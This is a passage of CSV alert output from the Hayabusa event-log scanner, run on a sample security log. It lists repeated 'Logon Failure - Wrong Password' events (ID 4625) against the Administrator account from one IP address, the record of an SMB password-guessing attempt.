NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zv0cbLCD7E05i0g5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FIKsQLk5iPyKoeqM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RiHAaBszJBGe2deQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8em4eOiqze683Cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86lXQsnn7dae93tW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.524 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Iu8olNGPmhxh6iNu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZYtN5EMHxcNqID6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mtUQGxrMoPkpUQCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYh4e3bpePhDoRwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UkC8E9uKpCgD1BHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZCDxpmDZbpGCey3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SS2dxS3WvCrAyiB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YT3VHxKNf8q14rro | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fx9HQT3u3Ig6vJ3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FukPQsr4SXRshyTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7AutKUyPELNRUcA4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.081 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 38gBkWcYdZW6Wcdz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HMKnLRQCDn1CHZdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ShGnRYHfVSuPvfcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LXVWG3Yl0utv98Zf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VDfa0UebgleQMK5U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxTLJJsWs9dOc5JC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7cKtymmsQJSM6zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbtC0srNyvkIHOSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPGlJ6ZjGSfUKrCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Uw95Ema8vWlRXKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hHTrBmhkjGLTNt2R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.574 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJeRVGKULJIo76aa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kipf0Z2Tse2eWoxa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnP7tmMJXDVzIDim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CBeMt62oqlIICShT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIfXRZQkKRJAw4er | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wrqSJPALo5QtUnS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81Mm67AdwpPJMCMm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jwq5jXlMRU1SNLO5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d7OYj8ynCEl5dG9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YzT8vF7ANYnjSRgd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4eYIoww4uL6oYZu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.199 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DpO8L2Fky4zYwp2q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGmxSy48sphENTiY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tQVAkjteLFK0hbyE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMWKsQ8l0j9fZPfA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ct7xYUYH9sr7mva | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBn0XxaPOZQokJ0Z | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nQELRxrGuXqkYgO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5eT0mykgLNZQygq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qMyIqRidF6oBdzog | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ULnnFcF98k9zpNTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j5k02pcelZNGwF3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.693 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qfcC6LqJqs0EeGjE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXALYkkitmyAFq14 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIqQmExq22WrW4md | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ydHqjdZhLMI9gjfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSe45VZNPdovPbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hiHlcR6qNGE0P7TK | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iT3jPdHr89RqPlyd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0QFnABeYK39XEntR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5plMYSBQi5mKmdlk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TaxWckQUCMgWvCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81xZ7iisEyTABmUm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.187 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qYiQ2xjMQFQwH2XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRN8e3yzZzxc2p3A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCa6PN0C7XznvipG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hFqjIXbEb7eWUFUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkrVjLgnJZlIyXpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2r5tyuIYijAXN5be | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AgjQNe9hQrLIETDn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNoInpFTsixZDIu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ladJUS6I0HMIwdef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oW63pJlVtjgn3YY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKNu8b2To2Y1twUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.637 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9sN5xm3GytfmM7G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtQQS61GYBm6WUUz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WxxawZZMhNCGHxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong 